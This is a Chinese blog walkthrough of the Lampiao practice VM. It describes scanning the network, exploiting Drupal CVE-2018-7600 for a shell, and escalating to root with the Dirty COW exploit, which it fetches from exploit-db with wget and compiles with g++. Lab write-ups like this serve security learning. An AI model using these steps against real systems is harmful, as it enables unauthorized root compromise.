美文网首页
Lampiao记录

Lampiao记录

作者: __周__ | 来源:发表于2018-09-03 13:01 被阅读0次

打开虚拟机显示登陆界面,没密码,登个锤子,老老实实去扫描ip


图片.png

一个一个的去试,到141的时候看到正常的web界面,然后扔到nmap里面去扫端口

找到一个apache的1898端口,连上去试试


图片.png

真的有另一个网站,drupal的cms,用的是CVE-2018-7600代码执行这个漏洞
拿到shell,是一个www-data的权限,这里需要我们进行提权


图片.png
查看当前系统版本
图片.png

用到脏牛提权(CVE-2016-5195)

该程序成功用于:

  • RHEL7 Linux x86_64;
  • RHEL4(4.4.7-16,带“遗留”版本)
  • Debian 7(“wheezy”);
  • Ubuntu 14.04.1 LTS
  • Ubuntu 14.04.5 LTS
  • Ubuntu 16.04.1 LTS
  • Ubuntu 16.10
  • Linux Mint 17.2

因为靶机连不上网,所以我这里把利用的脚本下载到本地,放到web目录下

wget  https://www.exploit-db.com/download/40847.cpp

在服务器上同理down到本地,然后进行编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

之后在本地生成了一个dcow的文件


图片.png

拿到root密码,直接ssh连上去

相关文章

  • Lampiao记录

    打开虚拟机显示登陆界面,没密码,登个锤子,老老实实去扫描ip 一个一个的去试,到141的时候看到正常的web界面,...

  • Lampiao渗透实战

    在Lampiao渗透中,drupal 7的getshell漏洞值得深入学习,有机会自己可以复现,了解一下原理;该靶...

  • 记录记录再记录

    先发个标题 明天再补上

  • DNS服务记录类型

    DNS记录类型包含:A记录、AAAA记录、CNAME记录、MX记录、NS记录、TXT记录、SRV记录、URL转发。...

  • 记录,记录

    今天是3月18日,我上网搜了一下,历史上的今天发生了很多事,觉得非常不可思议。 有两个事件大家应该都能比较熟悉:第...

  • 记录,记录

    2020.03.12 今天这个日子总觉得需要留下点什么。 今天BTC最低触至5200u,不行,暂停一下,先把交易所...

  • 记录记录

    时间好快,公休瞬间结束!这个公休我经历了什么?感觉就没有休息。 这段时间确实经历了很多。有家事,有其他事...

  • 记录没有记录的记录

    昨夜 凝望息屏的手机 如同熟睡的恋人 盼她醒以拥抱,却又不忍惊扰 “砰,砰,砰” 雨骑在风的肩上 兴冲冲地拍着窗门...

  • 初心

    创作,为了记录,记录生活,记录心情,记录回忆……

  • 至情至性的散文

    特别渴望写出至情至性的散文。 ——记录青春、记录梦想、记录人生感悟、记录成长历程、记录心灵之旅、记录亲情、记录迷茫...

网友评论

      本文标题:Lampiao记录

      本文链接:https://www.haomeiwen.com/subject/qgsrwftx.html